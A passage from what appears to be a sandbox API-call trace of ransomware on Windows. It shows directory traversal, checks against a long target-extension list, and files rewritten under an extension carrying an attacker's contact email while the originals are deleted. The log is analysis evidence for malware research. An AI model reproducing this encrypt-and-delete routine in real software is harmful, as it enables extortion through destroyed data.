lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.153] SetEndOfFile (hFile=0x390) returned 1 [0274.153] CloseHandle (hObject=0x390) returned 1 [0274.153] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.153] SetEndOfFile (hFile=0x2bc) returned 1 [0274.155] CloseHandle (hObject=0x2bc) returned 1 [0274.155] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.284] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099150.jpg")) returned 1 [0274.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63 [0274.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63 [0274.324] lstrlenW (lpString=".doc") returned 4 [0274.324] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0274.324] lstrlenW (lpString=".docx") returned 5 [0274.324] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1 [0274.324] lstrlenW (lpString=".pdf") returned 4 [0274.324] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0274.324] lstrlenW (lpString=".xls") returned 4 [0274.325] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0274.325] lstrlenW (lpString=".xlsx") returned 5 [0274.325] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1 [0274.325] lstrlenW (lpString=".ppt") returned 4 [0274.325] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0274.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63 [0274.325] lstrlenW (lpString=".zip") returned 4 [0274.325] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0274.325] lstrlenW (lpString=".rar") returned 4 [0274.325] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0274.325] lstrlenW (lpString=".bz2") returned 4 [0274.325] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0274.325] lstrlenW (lpString=".7z") returned 3 [0274.325] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0274.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63 [0274.325] lstrlenW (lpString=".dbf") returned 4 [0274.325] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0274.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63 [0274.325] lstrlenW (lpString=".1cd") returned 4 [0274.325] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0274.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 63 [0274.325] lstrlenW (lpString=".jpg") returned 4 [0274.325] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0274.326] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=19656) returned 1 [0274.326] CloseHandle (hObject=0x390) returned 1 [0274.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg")) returned 0x20 [0274.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0274.326] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.326] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0274.326] GetLastError () returned 0x0 [0274.326] ReadFile (in: hFile=0x390, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x4cc8, lpOverlapped=0x0) returned 1 [0274.363] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x4cd0, lpOverlapped=0x0) returned 1 [0274.364] ReadFile (in: hFile=0x390, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.364] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.364] SetEndOfFile (hFile=0x3b4) returned 1 [0274.364] CloseHandle (hObject=0x3b4) returned 1 [0274.364] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.364] SetEndOfFile (hFile=0x390) returned 1 [0274.366] CloseHandle (hObject=0x390) returned 1 [0274.366] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.383] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg")) returned 1 [0274.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63 [0274.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63 [0274.414] lstrlenW (lpString=".doc") returned 4 [0274.414] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0274.414] lstrlenW (lpString=".docx") returned 5 [0274.414] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0274.414] lstrlenW (lpString=".pdf") returned 4 [0274.414] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0274.414] lstrlenW (lpString=".xls") returned 4 [0274.414] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0274.414] lstrlenW (lpString=".xlsx") returned 5 [0274.414] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0274.414] lstrlenW (lpString=".ppt") returned 4 [0274.414] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0274.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63 [0274.414] lstrlenW (lpString=".zip") returned 4 [0274.414] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0274.414] lstrlenW (lpString=".rar") returned 4 [0274.414] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0274.414] lstrlenW (lpString=".bz2") returned 4 [0274.414] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0274.414] lstrlenW (lpString=".7z") returned 3 [0274.414] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0274.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63 [0274.414] lstrlenW (lpString=".dbf") returned 4 [0274.414] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0274.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63 [0274.414] lstrlenW (lpString=".1cd") returned 4 [0274.415] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0274.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 63 [0274.415] lstrlenW (lpString=".jpg") returned 4 [0274.415] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0274.424] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=21946) returned 1 [0274.424] CloseHandle (hObject=0x3c0) returned 1 [0274.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099164.wmf")) Thread: id = 61 os_tid = 0x688 [0263.647] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x34f0060 [0263.647] lstrlenW (lpString="C:") returned 2 [0263.647] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x30ffd00 | out: lpFindFileData=0x30ffd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x607760 [0263.650] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0263.650] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0263.650] lstrlenW (lpString="$Recycle.Bin") returned 12 [0263.650] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0263.650] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x3500068 [0263.651] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0263.651] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x30ffa84 | out: lpFindFileData=0x30ffa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6189b0 [0263.651] FindNextFileW (in: hFindFile=0x6189b0, lpFindFileData=0x30ffa84 | out: lpFindFileData=0x30ffa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.651] FindNextFileW (in: hFindFile=0x6189b0, lpFindFileData=0x30ffa84 | out: lpFindFileData=0x30ffa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd80b6bc0, ftLastAccessTime.dwHighDateTime=0x1d53e4e, ftLastWriteTime.dwLowDateTime=0xd80b6bc0, ftLastWriteTime.dwHighDateTime=0x1d53e4e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0263.651] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0263.651] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0263.651] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0263.651] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0263.651] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x3510070 [0263.651] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0263.651] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x30ff808 | out: lpFindFileData=0x30ff808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd80b6bc0, ftLastAccessTime.dwHighDateTime=0x1d53e4e, ftLastWriteTime.dwLowDateTime=0xd80b6bc0, ftLastWriteTime.dwHighDateTime=0x1d53e4e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6199f8 [0263.651] FindNextFileW (in: hFindFile=0x6199f8, lpFindFileData=0x30ff808 | out: lpFindFileData=0x30ff808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd80b6bc0, ftLastAccessTime.dwHighDateTime=0x1d53e4e, ftLastWriteTime.dwLowDateTime=0xd80b6bc0, ftLastWriteTime.dwHighDateTime=0x1d53e4e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.651] FindNextFileW (in: hFindFile=0x6199f8, lpFindFileData=0x30ff808 | out: lpFindFileData=0x30ff808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd80b6bc0, ftCreationTime.dwHighDateTime=0x1d53e4e, ftLastAccessTime.dwLowDateTime=0xd80b6bc0, ftLastAccessTime.dwHighDateTime=0x1d53e4e, ftLastWriteTime.dwLowDateTime=0xd80b6bc0, ftLastWriteTime.dwHighDateTime=0x1d53e4e, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0263.652] lstrlenW (lpString="desktop.ini") returned 11 [0263.652] lstrlenW (lpString=".1cd") returned 4 [0263.652] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0263.652] lstrlenW (lpString=".3ds") returned 4 [0263.652] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0263.652] lstrlenW (lpString=".3fr") returned 4 [0263.652] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0263.652] lstrlenW (lpString=".3g2") returned 4 [0263.652] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0263.652] lstrlenW (lpString=".3gp") returned 4 [0263.652] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0263.652] lstrlenW (lpString=".7z") returned 3 [0263.652] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0263.652] lstrlenW (lpString=".accda") returned 6 [0263.652] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0263.652] lstrlenW (lpString=".accdb") returned 6 [0263.652] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0263.652] lstrlenW (lpString=".accdc") returned 6 [0263.652] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0263.652] lstrlenW (lpString=".accde") returned 6 [0263.652] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0263.652] lstrlenW (lpString=".accdt") returned 6 [0263.652] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0263.652] lstrlenW (lpString=".accdw") returned 6 [0263.652] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0263.652] lstrlenW (lpString=".adb") returned 4 [0263.652] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0263.652] lstrlenW (lpString=".adp") returned 4 [0263.652] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0263.652] lstrlenW (lpString=".ai") returned 3 [0263.653] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0263.653] lstrlenW (lpString=".ai3") returned 4 [0263.653] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0263.653] lstrlenW (lpString=".ai4") returned 4 [0263.653] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0263.653] lstrlenW (lpString=".ai5") returned 4 [0263.653] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0263.653] lstrlenW (lpString=".ai6") returned 4 [0263.653] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0263.653] lstrlenW (lpString=".ai7") returned 4 [0263.653] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0263.653] lstrlenW (lpString=".ai8") returned 4 [0263.653] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0263.653] lstrlenW (lpString=".anim") returned 5 [0263.653] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0263.653] lstrlenW (lpString=".arw") returned 4 [0263.653] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0263.653] lstrlenW (lpString=".as") returned 3 [0263.653] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0263.653] lstrlenW (lpString=".asa") returned 4 [0263.653] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0263.653] lstrlenW (lpString=".asc") returned 4 [0263.653] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0263.653] lstrlenW (lpString=".ascx") returned 5 [0263.653] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0263.653] lstrlenW (lpString=".asm") returned 4 [0263.653] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0263.653] lstrlenW (lpString=".asmx") returned 5 [0263.653] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0263.653] lstrlenW (lpString=".asp") returned 4 [0263.653] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0263.654] lstrlenW (lpString=".aspx") returned 5 [0263.654] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0263.654] lstrlenW (lpString=".asr") returned 4 [0263.654] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0263.654] lstrlenW (lpString=".asx") returned 4 [0263.654] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0263.654] lstrlenW (lpString=".avi") returned 4 [0263.654] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0263.654] lstrlenW (lpString=".avs") returned 4 [0263.654] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0263.654] lstrlenW (lpString=".backup") returned 7 [0263.654] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0263.654] lstrlenW (lpString=".bak") returned 4 [0263.654] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0263.654] lstrlenW (lpString=".bay") returned 4 [0263.654] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0263.654] lstrlenW (lpString=".bd") returned 3 [0263.654] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0263.654] lstrlenW (lpString=".bin") returned 4 [0263.654] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0263.654] lstrlenW (lpString=".bmp") returned 4 [0263.654] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0263.654] lstrlenW (lpString=".bz2") returned 4 [0263.654] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0263.654] lstrlenW (lpString=".c") returned 2 [0263.654] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0263.654] lstrlenW (lpString=".cdr") returned 4 [0263.654] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0263.654] lstrlenW (lpString=".cer") returned 4 [0263.654] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0263.654] lstrlenW (lpString=".cf") returned 3 [0263.655] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0263.655] lstrlenW (lpString=".cfc") returned 4 [0263.655] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0263.655] lstrlenW (lpString=".cfm") returned 4 [0263.655] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0263.655] lstrlenW (lpString=".cfml") returned 5 [0263.655] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0263.655] lstrlenW (lpString=".cfu") returned 4 [0263.655] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0263.655] lstrlenW (lpString=".chm") returned 4 [0263.655] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0263.655] lstrlenW (lpString=".cin") returned 4 [0263.655] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0263.655] lstrlenW (lpString=".class") returned 6 [0263.655] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0263.655] lstrlenW (lpString=".clx") returned 4 [0263.655] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0263.655] lstrlenW (lpString=".config") returned 7 [0263.655] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0263.655] lstrlenW (lpString=".cpp") returned 4 [0263.655] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0263.655] lstrlenW (lpString=".cr2") returned 4 [0263.655] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0263.655] lstrlenW (lpString=".crt") returned 4 [0263.655] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0263.655] lstrlenW (lpString=".crw") returned 4 [0263.655] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0263.655] lstrlenW (lpString=".cs") returned 3 [0263.655] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0263.655] lstrlenW (lpString=".css") returned 4 [0263.655] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".csv") returned 4 [0263.656] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".cub") returned 4 [0263.656] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".dae") returned 4 [0263.656] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".dat") returned 4 [0263.656] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".db") returned 3 [0263.656] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0263.656] lstrlenW (lpString=".dbf") returned 4 [0263.656] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".dbx") returned 4 [0263.656] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".dc3") returned 4 [0263.656] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".dcm") returned 4 [0263.656] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".dcr") returned 4 [0263.656] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".der") returned 4 [0263.656] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".dib") returned 4 [0263.656] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".dic") returned 4 [0263.656] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".dif") returned 4 [0263.656] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0263.656] lstrlenW (lpString=".divx") returned 5 [0263.656] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0263.656] lstrlenW (lpString=".djvu") returned 5 [0263.657] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0263.657] lstrlenW (lpString=".dng") returned 4 [0263.657] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0263.657] lstrlenW (lpString=".doc") returned 4 [0263.657] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0263.657] lstrlenW (lpString=".docm") returned 5 [0263.657] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0263.657] lstrlenW (lpString=".docx") returned 5 [0263.657] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0263.657] lstrlenW (lpString=".dot") returned 4 [0263.657] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0263.657] lstrlenW (lpString=".dotm") returned 5 [0263.657] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0263.657] lstrlenW (lpString=".dotx") returned 5 [0263.657] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0263.657] lstrlenW (lpString=".dpx") returned 4 [0263.657] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0263.657] lstrlenW (lpString=".dqy") returned 4 [0263.657] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0263.657] lstrlenW (lpString=".dsn") returned 4 [0263.657] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0263.657] lstrlenW (lpString=".dt") returned 3 [0263.657] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0263.657] lstrlenW (lpString=".dtd") returned 4 [0263.657] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0263.657] lstrlenW (lpString=".dwg") returned 4 [0263.657] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0263.657] lstrlenW (lpString=".dwt") returned 4 [0263.657] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0263.657] lstrlenW (lpString=".dx") returned 3 [0263.657] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0263.658] lstrlenW (lpString=".dxf") returned 4 [0263.658] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0263.658] lstrlenW (lpString=".edml") returned 5 [0263.658] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0263.658] lstrlenW (lpString=".efd") returned 4 [0263.658] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0263.658] lstrlenW (lpString=".elf") returned 4 [0263.658] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0263.658] lstrlenW (lpString=".emf") returned 4 [0263.658] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0263.658] lstrlenW (lpString=".emz") returned 4 [0263.658] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0263.658] lstrlenW (lpString=".epf") returned 4 [0263.658] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0263.658] lstrlenW (lpString=".eps") returned 4 [0263.658] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0263.658] lstrlenW (lpString=".epsf") returned 5 [0263.658] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0263.658] lstrlenW (lpString=".epsp") returned 5 [0263.658] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0263.658] lstrlenW (lpString=".erf") returned 4 [0263.658] 